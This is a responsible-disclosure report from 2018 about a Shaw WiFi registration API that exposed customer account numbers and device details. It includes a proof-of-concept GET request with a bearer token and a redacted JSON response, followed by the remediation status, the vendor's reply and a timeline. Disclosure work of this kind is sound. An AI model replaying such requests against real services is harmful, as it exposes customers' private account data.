This report was fully disclosed on 23 September 2018

Summary

By sending a GET request to a specific API location it is possible to obtain a customer’s account number in addition to registered device IDs and MAC Addresses of associated Shaw Go Wifi devices.

This attack requires some authentication. For the request to be successful an access_token needs to be generated either from an IP associated with that customer or by remotely logging into a @shaw.ca email associated with that customer.

Proof of Concept

We can generate access_token by visiting https://wifi-registration.shaw.ca/drp/ and inspecting the response from /api/token.

Request:

GET /api/customer/account/ HTTP/1.1
Host: wifi-registration.shaw.ca
Connection: close
Accept: application/json
Authorization: Bearer [access_token_redacted]
Content-Length: 26

Cookie:

[object Object]

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Aug 2018 13:37:00 GMT
Content-Type: application/json
Content-Length: 381
Connection: close
Set-Cookie: txGUID=████████-████-████-████-████████████; path=/; domain=shaw.ca
Set-Cookie: WiFiCaptivePortalDetails=[REDACTED]; path=/; expires=Fri, 10 Aug 2018 13:37:00 GMT; domain=shaw.ca
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Cache-Control: no-cache
Set-Cookie: captive_env=prod

{"account_id":"03161234567","account_status":"active","device_quota":10,"url":"/accounts/03161234567","downlink_speed":"30","uplink_speed":"5","service_code":"830-137","service_type":"Residential","service_description":"INTERNET 150 PLUS","service_status":"active","quota_available":true,"devices":[],"account_number":"03161234567","response_time":"0.123s","v":"2.9.11-6.899e73c0"}

Some details in this response have been altered or redacted to ensure the privacy of the account owner.

  • Implement proper access controls to prevent information disclosure.

Remediation Status

At the time of publishing this report access_token generated by visiting https://wifi-registration.shaw.ca/drp/ from an IP associated with the customer now result in the response showing 401 Unauthorized. However this access token can still be generated by logging in to a @shaw.ca email address associated with that customer.

Furthermore successful requests now show {"response_time":"0.123s","v":"2.9.12-1.4c02e4ac"} indicating the software version has been updated since this report.

Response From Affected Party

Response From [email protected] 23 Sept 2018

We would like to thank @glitchwitch for bringing this issue to our attention. As a result of this exercise, Shaw’s WiFi device management was able to make security advancements, and we consider this matter resolved.

Regards.

Shaw Customer Protection Team

E: [email protected]

This message is confidential and may contain privileged information. We ask that you not use or disclose this message other than with our consent.

If you are not an intended recipient, please immediately notify us and delete this message. Thank-you.

Timeline

  • 10 August 2018: Affected Party Notified
  • 23 September 2018: Affected Party Released Patch (+44 days)
  • 23 September 2018: Report Published (+44 days)